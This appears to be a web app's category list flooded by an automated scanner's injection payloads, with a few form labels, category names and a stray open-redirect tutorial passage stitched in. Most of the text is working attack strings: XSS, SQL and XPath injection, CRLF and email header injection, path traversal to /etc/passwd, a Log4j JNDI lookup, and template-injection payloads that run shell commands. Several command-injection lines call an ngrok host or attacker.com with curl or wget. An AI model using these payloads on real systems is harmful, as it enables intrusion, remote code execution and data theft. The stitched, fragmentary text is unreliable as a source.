0
Close
Allow
Clothes
Technology
Furniture
Shoes
Miscellaneous
New category
=DDE("cmd","/c calc","")
victim@test.com%0aCc:attacker@evil.com
victim@test.com%0aBcc:attacker@evil.com
Updated Category
victim@test.com%0d%0aBcc:attacker@evil.com
victim@test.com\nCc:attacker@evil.com
victim@test.com\r\nBcc:attacker@evil.com
victim@test.com Subject:Phishing Email
victim@test.com%0aSubject:URGENT-Password Reset
admin%0d%0a[INFO] User logged in successfully
victim@test.com%0aContent-Type:text/html
test\n[CRITICAL] System compromised
victim@test.com%0a%0a<html><body>Phishing content</body></html>
${jndi:ldap://attacker.com/a}
victim@test.com%0aFrom:admin@legitimate.com
invalid_test_value_xyz_12345
victim@test.com%0aX-Mailer:EvilMailer
victim@test.com%0aReturn-Path:attacker@evil.com
victim@test.com%0aMIME-Version:1.0%0aContent-Type:multipart/mixed;boundary=evil
victim@test.com%0a--evil%0aContent-Type:text/html%0a%0a<script>alert(1)</script>%0a--evil--
victim@test.com%0aContent-Transfer-Encoding:base64
victim@test.com%0aContent-Disposition:attachment;filename=evil.exe
"victim@test.com Cc:attacker@evil.com"
victim@test.com%00attacker@evil.com
victim@test.com%0aX-Priority:1
victim@test.com%0aImportance:high
victim@test.com%0aDisposition-Notification-To:attacker@evil.com
victim@test.com%0aList-Unsubscribe:<http://attacker.com>
victim@test.com%0aX-Originating-IP:127.0.0.1
victim@test.com%0aReceived:from attacker.com
victim@test.com%0aMessage-ID:<evil@attacker.com>
victim@test.com%0aDate:Mon,01Jan200100:00:00+0000
victim@test.com%0aIn-Reply-To:<original@legitimate.com>
аdmin
%3Cscript%3Ealert(1)%3C/script%3E
%253Cscript%253Ealert(1)%253C/script%253E
<script>alert(1)</script>
<script>alert(1)</script>
\x3Cscript\x3Ealert(1)\x3C/script\x3E
%c0%bc%c0%bc%c0%bcscript%c0%be
JTNDc2NyaXB0JTNFYWxlcnQoMSklM0Mvc2NyaXB0JTNF
PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
' AND 1=1--
%27%20AND%201=1--
' AN%44 1=1--
..%2f..%2f..%2fetc%2fpasswd
..%252f..%252f..%252fetc%252fpasswd
..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
<ScRiPt>alert(1)</ScRiPt>
<scr<script>ipt>alert(1)</scr</script>ipt>
<script/src=data:,alert(1)>
java%00script:alert(1)
javascript:alert(1)
\74script\76alert(1)\74/script\76
' OR '1'='1
%uff1cscript%uff1ealert(1)%uff1c/script%uff1e
\u003Cscript\u003Ealert(1)\u003C/script\u003E
; cat /etc/passwd
<svg/onload=alert(1)>
{{7*7}}
jav	ascript:alert(1)
jav
ascript:alert(1)
[object Object]
../../../etc/passwd
..%2f..%2f..%2fetc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
..%252f..%252f..%252fetc/passwd
..%c0%af..%c0%af..%c0%afetc/passwd
..%255c..%255c..%255cwindows/win.ini
<svg><style><img src=x onerror=alert('mxsse8408139')>
normalvalue123
{"$gt": undefined}
normaltext123
<!--#echo var="DATE_LOCAL"-->
<!--#exec cmd="id"-->
{{_self.env.registerUndefinedFilterCallback('exec')}}{{_self.env.getFilter('id')}}
{{config}}
{{config.__class__.__init__.__globals__['os'].popen('id').read()}}
{{''.__class__.__mro__[2].__subclasses__()}}
{{''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}}
{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}
{{cycler.__init__.__globals__.os.popen('id').read()}}
{{joiner.__init__.__globals__.os.popen('id').read()}}
<#assign ex="freemarker.template.utility.Execute"?new()>${ex("id")}
${"freemarker.template.utility.Execute"?new()("id")}
[[${T(java.lang.Runtime).getRuntime().exec('id')}]]
${#rt = @java.lang.Runtime@getRuntime(),#rt.exec('id')}
#set($x='')#set($rt=$x.class.forName('java.lang.Runtime'))#set($chr=$x.class.forName('java.lang.Character'))#set($str=$x.class.forName('java.lang.String'))#set($ex=$rt.getRuntime().exec('id'))$ex.waitFor()#set($out=$ex.getInputStream())#foreach($i in [1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end
$class.inspect('java.lang.Runtime').type.getRuntime().exec('id')
<%= system('id') %>
<%= `id` %>
<%= IO.popen('id').read %>
{{self.__init__.__globals__.__builtins__['eval']('__import__("os").popen("id").read()')}}
{{lipsum.__globals__.os.popen('id').read()}}
{{namespace.__init__.__globals__.os.popen('id').read()}}
{{url_for.__globals__['os'].popen('id').read()}}
{{get_flashed_messages.__globals__['os'].popen('id').read()}}
{{191*53}}
{{3847*2963}}
a]{{7*7}}
${{<%[%'"}}%\.
{{dump(app)}}
{"$gt": ""}<!-- SO2ND_nosqli_480c8c19 -->
{% import os %}{{ os.popen("curl https://uncloyed-eden-soughfully.ngrok-free.dev/i/5d895a4f2a48d5b35b70/ssti").read() }}
${"https://uncloyed-eden-soughfully.ngrok-free.dev/i/5d895a4f2a48d5b35b70/ssti"?url?content}
#set($x="")#set($rt=$x.class.forName("java.lang.Runtime"))#set($chr=$x.class.forName("java.lang.Character"))#set($str=$x.class.forName("java.lang.String"))#set($ex=$rt.getRuntime().exec("curl https://uncloyed-eden-soughfully.ngrok-free.dev/i/5d895a4f2a48d5b35b70/ssti"))$ex.waitFor()
{{["curl https://uncloyed-eden-soughfully.ngrok-free.dev/i/5d895a4f2a48d5b35b70/ssti"]|filter("system")}}
<%= `curl https://uncloyed-eden-soughfully.ngrok-free.dev/i/5d895a4f2a48d5b35b70/ssti` %>
test%0d%0aSet-Cookie:session=malicious
test%0d%0aX-Injected:true
test%0aSet-Cookie:session=malicious
test\r\nSet-Cookie:pwned=1
test%E5%98%8A%E5%98%8DSet-Cookie:test=1
test%0d%0aLocation:https://attacker.com
testX-Forwarded-For: 127.0.0.1
testX-Forwarded-Host: attacker.com
testX-Original-URL: /admin
testHost: attacker.com
test%0d%0aAccess-Control-Allow-Origin:*
testX-HTTP-Method-Override: DELETE
test%0d%0aTransfer-Encoding:chunked
test/%%0a0aSet-Cookie:crlf=injection
test/%0aSet-Cookie:crlf=injection
test/%0d%0aSet-Cookie:crlf=injection
test/%0dSet-Cookie:crlf=injection
test/%23%0aSet-Cookie:crlf=injection
test/%23%0d%0aSet-Cookie:crlf=injection
test/%23%0dSet-Cookie:crlf=injection
test/%25%30%61Set-Cookie:crlf=injection
test/%25%30aSet-Cookie:crlf=injection
test/%250aSet-Cookie:crlf=injection
test/%25250aSet-Cookie:crlf=injection
test/%2e%2e%2f%0d%0aSet-Cookie:crlf=injection
test/%2f%2e%2e%0d%0aSet-Cookie:crlf=injection
test/%2F..%0d%0aSet-Cookie:crlf=injection
test/%3f%0d%0aSet-Cookie:crlf=injection
test/%3f%0dSet-Cookie:crlf=injection
test/%u000aSet-Cookie:crlf=injection
testHost: evil.com
testX-Forwarded-Host: evil.com
testX-Forwarded-For: 127.0.0.1 X-Injected-Header: evil
testReferer: javascript:alert(1)
testUser-Agent: <script>alert(1)</script>
testX-Original-URL: /admin/dashboard
testX-Rewrite-URL: /admin
testX-Custom-IP-Authorization: 127.0.0.1
testHost: localhost Host: target.com
testX-Forwarded-Proto: http
testConnection: keep-alive Transfer-Encoding: chunked
testAccept-Language: en Set-Cookie: admin=true
testX-Debug: true
testX-Forwarded-Port: 443 X-Forwarded-Scheme: https
testVia: 1.1 evil-proxy
<script>alert('xss40530d4e')</script>
<img src=x onerror=alert('SO2ND_xss_cfa56d45'+1)>
${applicationScope}
${sessionScope}
${requestScope}
${pageContext}
${pageContext.request.serverName}
${pageContext.request.contextPath}
${pageContext.servletContext.classLoader}
${T(java.lang.System).getenv()}
${T(java.lang.System).getProperty('user.dir')}
#{T(java.lang.Runtime).getRuntime().exec('whoami')}
${new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec('id').getInputStream()).useDelimiter('\\A').next()}
${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec('id').getInputStream())}
%{(#cmd='id').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd','/c',#cmd}:{'/bin/sh','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start())}
${#this.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec('id')}
${request.getClass().getClassLoader().loadClass('java.lang.Runtime').getMethod('getRuntime').invoke(null).exec('id')}
#{request.getClass().getClassLoader().loadClass('java.lang.ProcessBuilder').getDeclaredConstructors()[0].newInstance(['id']).start()}
${facesContext.getExternalContext().getRequest()}
#{facesContext.getExternalContext().getResponse().getWriter().write('INJECTED')}
${T(java.nio.file.Files).readAllLines(T(java.nio.file.Paths).get('/etc/passwd'))}
${T(java.nio.file.Files).write(T(java.nio.file.Paths).get('/tmp/pwned'),'pwned'.getBytes())}
${T(java.net.InetAddress).getLocalHost().getHostName()}
${T(java.lang.Thread).currentThread().getContextClassLoader().getResource('')}
${T(org.springframework.util.StreamUtils).copyToString(T(java.lang.Runtime).getRuntime().exec('id').getInputStream(),T(java.nio.charset.Charset).forName('UTF-8'))}
#{session.setAttribute('admin',true)}
${param.cmd.getClass().forName('java.lang.Runtime').getRuntime().exec(param.cmd)}
${header['user-agent'].getClass().forName('java.lang.Runtime')}
${cookie.JSESSIONID.value}
${initParam}
${pageContext.request.getSession().getAttribute('user')}
#{bean.getClass().getProtectionDomain().getCodeSource().getLocation()}
${T(java.lang.Class).forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('js').eval('java.lang.Runtime.getRuntime().exec("id")')}
${#a=new java.util.Scanner(new java.io.File('/etc/passwd')).useDelimiter('\\Z').next()}
#{messages[''.getClass().forName('java.lang.Runtime').getMethod('exec',''.getClass()).invoke(''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null),'id')]}
${T(javax.naming.InitialContext).doLookup('ldap://attacker.com/a')}
${T(java.sql.DriverManager).getConnection('jdbc:mysql://attacker.com/db')}
' or ''='
#{request.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('id')}
x' or name()='username' or 'x'='y
'] | //user/*[contains(*,'
${sessionScope.user.password}
' and count(/*)=1 and 'a'='a
${header['authorization']}
' and string-length(name(/*[1]))=4 and 'a'='a
#{facesContext.getExternalContext().getRequestParameterMap()}
${request.getServletContext().getRealPath('/')}
' and substring(name(/*[1]),1,1)='n' and 'a'='a
x]|//*[
' or 1=1 or ''='
admin' or '1'='1' or 'x'='y
x']//password | a]
x]/*[1]
' or contains(.,'admin')
1. Size of a string
2. Access a character with `substring`, and verify its value with the `codepoints-to-string` function
ps1 string(//user[name/text()='" +vuln_var1+ "' and password/text()='" +vuln_var1+ "']/account/text())
sql substring(//user[userid=5]/username,2,1)=CHAR_HERE substring(//user[userid=5]/username,2,1)=codepoints-to-string(INT_ORD_CHAR_HERE)
powershell http://example.com/?title=Foundation&type=*&rent_days=* and doc('//10.10.10.10/SHARE')
' and '
1' or '1
invalid_function()
' or invalid()='
' or 1=string('a')='
' or number('x')=1 or '
' or //*[namespace-uri()='http://test']='
' or exists(//*) or '
' or doc('http://evil.com')='
' or '1'='2
' or 1=2 or '
1 or 1=1
1 or 1=2
' or 'a'='a
' or 'a'='b
' or string-length('a')=1 or '
' or string-length('a')=2 or '
' or count(/*)>0 or '
' or count(/*)>999999 or '
' or //* or '
' or /nonexistent or '
' or position()=1 or '
' or position()=999999 or '
' or name()!='' or '
' or name()='nonexistent' or '
New category' or '1'='1
New category' or '1'='2
admin' or '1'='1' or 'x'='
admin' or '1'='2' or 'x'='
' or true() or '
' or false() or '
' or exists(/nonexistent) or '
' or doc('https://uncloyed-eden-soughfully.ngrok-free.dev/i/7b3a0331f54bd378587f')='
1) or doc('https://uncloyed-eden-soughfully.ngrok-free.dev/i/7b3a0331f54bd378587f') or (1
' or unparsed-text('https://uncloyed-eden-soughfully.ngrok-free.dev/i/7b3a0331f54bd378587f')='
' or saxon:parse('https://uncloyed-eden-soughfully.ngrok-free.dev/i/7b3a0331f54bd378587f')='
//attacker.com
https://target.com@attacker.com
javascript:alert(1)
data:text/html,<script>alert(1)</script>
https:attacker.com
https://targetcom.attacker.com
%2f%2fattacker.com
https://аttacker.com
https://127.0.0.1
https://169.254.169.254
file:///etc/passwd
gopher://attacker.com
dict://attacker.com
An attacker could exploit an open redirect here by replacing `userpreferredsite.com` with a link to a malicious website. They could then distribute this link in a phishing email or on another website. When users click the link, they are taken to the malicious website.
HTTP redirection status codes (those in the 3xx range) indicate that the client must take additional action to complete the request. Here are some of the most common ones:
* [300 Multiple Choices](https://httpstatuses.com/300) - This indicates that the request has more than one possible response. The client should choose one of them.
* [301 Moved Permanently](https://httpstatuses.com/301) - This means that the resource requested has been permanently moved to the URL given by the Location headers. All future requests should use the new URI.
* [302 Found](https://httpstatuses.com/302) - This response code means that the resource requested has been temporarily moved to the URL given by the Location headers. Unlike 301, it does not mean that the resource has been permanently moved, just that it is temporarily located somewhere else.
* [303 See Other](https://httpstatuses.com/303) - The server sends this response to direct the client to get the requested resource at another URI with a GET request.
* [304 Not Modified](https://httpstatuses.com/304) - This is used for caching purposes. It tells the client that the response has not been modified, so the client can continue to use the same cached version of the response.
* [305 Use Proxy](https://httpstatuses.com/305) - The requested resource must be accessed through a proxy provided in the Location header.
* [307 Temporary Redirect](https://httpstatuses.com/307) - This means that the resource requested has been temporarily moved to the URL given by the Location headers, and future requests should still use the original URI.
* [308 Permanent Redirect](https://httpstatuses.com/308) - This means the resource has been permanently moved to the URL given by the Location headers, and future requests should use the new URI. It is similar to 301 but does not allow the HTTP method to change.
Instead of query parameters, redirection logic may rely on the path:
* Using slashes in URLs: `https://example.com/redirect/http://malicious.com`
//evil.com
https:evil.com
//evil.com%00.trusted.com
https://attacker.com#@target.com
//attacker.com/%2f..
/%09/attacker.com
/%0d/attacker.com
/%0a/attacker.com
rfd_test_marker
;whoami
| dir
& type C:\Windows\win.ini
;sleep 5
& ping -n 5 127.0.0.1
;ping -c 5 127.0.0.1
;curl http://attacker.com/?x=$(whoami)
;wget http://attacker.com/?x=$(id)
|nslookup attacker.com
%0aid
%0awhoami
a]|id
;/???/??t /???/p??s??
;/???/b??/w?o?m?
;$'\x69\x64'
;$(printf '\x69\x64')
;i]d
${IFS}id
;id${IFS}
;cat$IFS/etc/passwd
| bash -c 'id'
| sh -c 'id'
| powershell -c whoami
;rev<<<'di'|bash
;base64 -d<<<'aWQ='|bash
1
; curl https://uncloyed-eden-soughfully.ngrok-free.dev/i/bd24c64c40cf660dada9/cmdi #
; wget -q https://uncloyed-eden-soughfully.ngrok-free.dev/i/bd24c64c40cf660dada9/cmdi -O /dev/null #
& nslookup uncloyed-eden-soughfully.ngrok-free.dev &
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
' UNION SELECT 1,2,3--
' UNION SELECT username,password FROM users--
' UNION ALL SELECT NULL,NULL,NULL,NULL--
1' AND '1'='1
1' AND '1'='2
1' AND '1'='2 AND 1=0
; id #;echo SO2ND_command_injection_599f91a7;
' OR '1'='1/*SO2ND_sqli_edbc96e3*/
; curl https://uncloyed-eden-soughfully.ngrok-free.dev/i/84d1031b96a928e85e28/rce #
; wget -q https://uncloyed-eden-soughfully.ngrok-free.dev/i/84d1031b96a928e85e28/rce -O /dev/null #
__import__('os').popen('curl https://uncloyed-eden-soughfully.ngrok-free.dev/i/84d1031b96a928e85e28/rce').read()
require('child_process').execSync('curl https://uncloyed-eden-soughfully.ngrok-free.dev/i/84d1031b96a928e85e28/rce')
<?php system('curl https://uncloyed-eden-soughfully.ngrok-free.dev/i/84d1031b96a928e85e28/rce'); ?>
{{['id']|filter('system')}}
{{['cat /etc/passwd']|filter('exec')}}
<?php system('id'); ?>
<?php exec('id'); ?>
<?php passthru('id'); ?>
<?php shell_exec('id'); ?>
<?php popen('id', 'r'); ?>
<?php proc_open('id', [], $pipes); ?>
<?php pcntl_exec('/bin/sh', ['-c', 'id']); ?>
test%0d%0a%0d%0aX-Injected:header: injected
Kategori lama
New Ctg
category_B
Nueva Categoria TF
Testing Category
Gaming Gear
All
Technology
Furniture
Shoes
Miscellaneous
Ingresar
0
init